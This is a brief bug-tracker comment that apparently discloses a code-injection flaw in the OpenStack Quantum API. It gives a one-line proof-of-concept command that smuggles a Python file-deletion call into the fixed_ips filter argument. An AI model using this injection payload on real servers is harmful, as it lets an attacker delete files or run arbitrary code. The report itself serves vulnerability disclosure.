Comment 1 for bug 1052179

The exploit can be triggered via the API. The following exploit will delete a file on the Quantum Server:

quantum port-list -- --fixed_ips "cfg.os.remove('/tmp/foo')"